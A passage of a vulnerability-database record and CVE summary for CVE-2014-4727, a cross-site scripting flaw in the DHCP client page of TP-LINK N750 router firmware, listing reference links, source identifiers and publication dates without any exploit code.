        "url": "http://www.securityfocus.com/archive/1/533499/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96139"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4727"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4727"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/533499/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/533501/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/96139"
      },
      {
        "trust": 0.1,
        "url": "http://elisyan.com/tplink/wdr4300.py"
      },
      {
        "trust": 0.1,
        "url": "http://elisyan.com/tplink/wdr4300.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4728"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4727"
      },
      {
        "trust": 0.1,
        "url": "http://www.tp-link.com/lk/products/details/?model=tl-wdr4300"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "PACKETSTORM",
        "id": "128343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "db": "BID",
        "id": "70037"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "db": "PACKETSTORM",
        "id": "128343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-09-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "date": "2014-09-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "date": "2014-09-21T00:00:00",
        "db": "BID",
        "id": "70037"
      },
      {
        "date": "2014-10-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "date": "2014-09-22T18:32:22",
        "db": "PACKETSTORM",
        "id": "128343"
      },
      {
        "date": "2014-09-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      },
      {
        "date": "2014-09-30T16:55:06.607000",
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-09-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-06261"
      },
      {
        "date": "2018-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-72668"
      },
      {
        "date": "2014-09-25T00:02:00",
        "db": "BID",
        "id": "70037"
      },
      {
        "date": "2014-10-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      },
      {
        "date": "2014-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      },
      {
        "date": "2025-04-12T10:46:40.837000",
        "db": "NVD",
        "id": "CVE-2014-4727"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "TP-LINK N750 Wireless Dual Band Gigabit Router firmware  DHCP Cross-site scripting vulnerability in client page",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004485"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "128343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201409-1169"
      }
    ],
    "trust": 0.7
  }
}

CVE-2014-4727 (GCVE-0-2014-4727)

Vulnerability from cvelistv5 – Published: 2014-09-30 16:00 – Updated: 2024-08-06 11:27

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

Tags

	https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF
	http://www.securityfocus.com/archive/1/533501/100…	mailing-listx_refsource_BUGTRAQ
	http://www.securityfocus.com/archive/1/533499/100…	mailing-listx_refsource_BUGTRAQ
	http://seclists.org/fulldisclosure/2014/Sep/80	mailing-listx_refsource_FULLDISC
	http://www.securityfocus.com/bid/70037	vdb-entryx_refsource_BID
	http://packetstormsecurity.com/files/128343/TP-LI…	x_refsource_MISC

Show details on NVD website